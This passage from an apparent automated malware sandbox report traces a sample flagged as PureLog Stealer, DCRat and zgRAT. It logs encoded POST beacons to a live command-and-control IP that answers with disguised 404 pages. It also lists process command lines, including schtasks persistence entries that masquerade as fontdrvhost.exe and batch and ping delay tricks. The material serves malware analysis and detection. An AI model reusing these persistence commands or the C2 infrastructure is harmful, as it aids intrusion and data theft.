                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:38:03.311923981 CET336OUTData Raw: 00 01 04 06 03 08 04 05 05 06 02 01 02 05 01 02 00 0b 05 0e 02 05 03 00 03 03 0a 00 07 03 02 09 0f 51 03 08 00 57 05 00 0c 53 06 01 00 00 04 07 04 50 0d 59 0d 03 07 07 06 03 07 07 06 51 04 0c 05 00 0f 0c 04 56 07 04 0f 57 0b 02 0e 01 0c 51 04 01
                                                                  Data Ascii: QWSPYQVWQU\U\L~Nsj`LSLvfpO~|SMtl|ksxll{pi^}t@vwl}e~V@@z}nNuy


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                  9 | 192.168.2.4 | 49746 | 89.23.98.225 | 80
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Mar 29, 2024 07:38:15.792608976 CET | 345 | OUT | POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:38:16.050306082 CET | 294 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:38:15 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: keep-alive
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                  Mar 29, 2024 07:38:16.254513025 CET344OUTData Raw: 05 00 04 07 03 08 04 05 05 06 02 01 02 0d 01 02 00 06 05 09 02 07 03 0f 02 03 0c 01 04 0e 00 00 0f 01 06 5a 01 02 06 05 0e 01 07 06 00 07 06 03 04 07 0c 5d 0a 07 04 00 06 05 06 51 05 01 04 00 01 01 0e 59 07 51 01 01 0c 53 0b 0f 0c 00 0e 08 07 57
                                                                  Data Ascii: Z]QYQSW[\L}S|Ne]wnYaetA}`UoX|MRoBp[{ceX}m{S`I|Au~V@xmbN}LS


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                  10 | 192.168.2.4 | 49747 | 89.23.98.225 | 80
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Mar 29, 2024 07:38:30.363462925 CET | 333 | OUT | POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:38:30.605541945 CET | 294 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:38:30 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 146
                                                                  Connection: keep-alive
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                  Mar 29, 2024 07:38:30.607585907 CET344OUTData Raw: 00 06 04 01 03 0d 01 04 05 06 02 01 02 04 01 00 00 06 05 0f 02 03 03 0d 03 06 0d 03 05 02 00 06 0f 51 06 5a 07 05 06 0b 0c 07 05 57 06 03 06 01 03 02 0c 5b 0f 0f 05 07 06 0e 06 51 04 56 05 01 02 05 0c 0e 05 05 01 04 0b 03 0c 05 0c 54 0b 04 02 07
                                                                  Data Ascii: QZW[QVTZTPR\L~C`uZtaj^beRBklr^tRZh|oRRZo`bmpCwI{^}e~V@@xCb~Le


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                  11 | 192.168.2.4 | 49748 | 89.23.98.225 | 80
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Mar 29, 2024 07:38:43.429280996 CET | 398 | OUT | POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:38:43.666553020 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:38:43 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:38:43.669164896 CET344OUTData Raw: 00 01 04 01 06 0c 04 00 05 06 02 01 02 0d 01 02 00 0b 05 0c 02 07 03 01 01 0e 0e 06 05 07 03 52 0e 04 04 0c 03 03 06 00 0e 51 02 01 05 00 04 56 07 03 0d 00 0e 04 06 02 04 55 07 0d 07 03 06 08 05 0b 0e 59 05 51 06 53 0b 0e 0f 07 0d 54 0d 01 04 0c
                                                                  Data Ascii: RQVUYQSTP\L~@k^e[vrbXb[^BjYt|c^`txdX{`yX|m|CwIU[e~V@xmP}L[


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                  12 | 192.168.2.4 | 49749 | 89.23.98.225 | 80
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Mar 29, 2024 07:38:55.054544926 CET | 381 | OUT | POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                  Host: 89.23.98.225
                                                                  Content-Length: 344
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Mar 29, 2024 07:38:55.290139914 CET | 696 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 29 Mar 2024 06:38:55 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 548
                                                                  Connection: keep-alive
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                  Mar 29, 2024 07:38:55.293150902 CET344OUTData Raw: 00 03 01 00 06 0f 01 0b 05 06 02 01 02 06 01 00 00 07 05 0a 02 02 03 0a 01 06 0d 0d 06 04 02 09 0e 02 06 5c 00 03 03 06 0c 06 02 02 07 05 07 56 04 50 0f 0a 0f 07 04 05 04 01 07 0c 07 00 05 5a 00 56 0d 5a 00 03 06 53 0d 03 0b 03 0e 0d 0e 53 05 0c
                                                                  Data Ascii: \VPZVZSSZQ\L}T~`zc[iulAk|etBth]holZ^{^b}sUcY^~e~V@BxCfO~\y


                                                                  Target ID:0
                                                                  Start time:07:36:51
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\ZT3pxe2Tb4.exe"
                                                                  Imagebase:0x9e0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1606720859.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1651517514.0000000013466000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:07:36:54
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f
                                                                  Imagebase:0x7ff76f990000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:07:36:54
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff76f990000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:07:36:55
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f
                                                                  Imagebase:0x7ff76f990000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:07:36:55
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:07:36:55
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:07:36:55
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:07:36:55
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\PING.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:ping -n 10 localhost
                                                                  Imagebase:0x7ff690150000
                                                                  File size:22'528 bytes
                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:07:36:56
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Imagebase:0x260000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\fontdrvhost.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\fontdrvhost.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 87%, ReversingLabs
                                                                  • Detection: 73%, Virustotal, Browse
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:07:36:56
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Imagebase:0x8f0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:10
                                                                  Start time:07:37:00
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:07:37:00
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:07:37:01
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:07:37:01
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\PING.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:ping -n 10 localhost
                                                                  Imagebase:0x7ff690150000
                                                                  File size:22'528 bytes
                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:07:37:04
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0xcc0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:16
                                                                  Start time:07:37:10
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:18
                                                                  Start time:07:37:10
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:19
                                                                  Start time:07:37:10
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:20
                                                                  Start time:07:37:10
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\PING.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:ping -n 10 localhost
                                                                  Imagebase:0x7ff690150000
                                                                  File size:22'528 bytes
                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:21
                                                                  Start time:07:37:12
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0x910000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:23
                                                                  Start time:07:37:18
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:24
                                                                  Start time:07:37:18
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:25
                                                                  Start time:07:37:18
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:26
                                                                  Start time:07:37:18
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\PING.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:ping -n 10 localhost
                                                                  Imagebase:0x7ff690150000
                                                                  File size:22'528 bytes
                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:27
                                                                  Start time:07:37:19
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0x370000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:30
                                                                  Start time:07:37:22
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:31
                                                                  Start time:07:37:22
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:32
                                                                  Start time:07:37:23
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:33
                                                                  Start time:07:37:23
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                  Imagebase:0x7ff703d60000
                                                                  File size:108'032 bytes
                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:34
                                                                  Start time:07:37:28
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0x6c0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:35
                                                                  Start time:07:37:30
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0x5e0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:37
                                                                  Start time:07:37:31
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:38
                                                                  Start time:07:37:31
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:39
                                                                  Start time:07:37:31
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6a54a0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:40
                                                                  Start time:07:37:31
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\w32tm.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                  Imagebase:0x7ff703d60000
                                                                  File size:108'032 bytes
                                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:41
                                                                  Start time:07:37:36
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat"
                                                                  Imagebase:0x7ff6f6770000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:42
                                                                  Start time:07:37:37
                                                                  Start date:29/03/2024
                                                                  Path:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\fontdrvhost.exe"
                                                                  Imagebase:0x7ff72bec0000
                                                                  File size:3'672'576 bytes
                                                                  MD5 hash:4164D5955C244FF266C1CC41013FE21A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:43
                                                                  Start time:07:37:37
                                                                  Start date:29/03/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:44
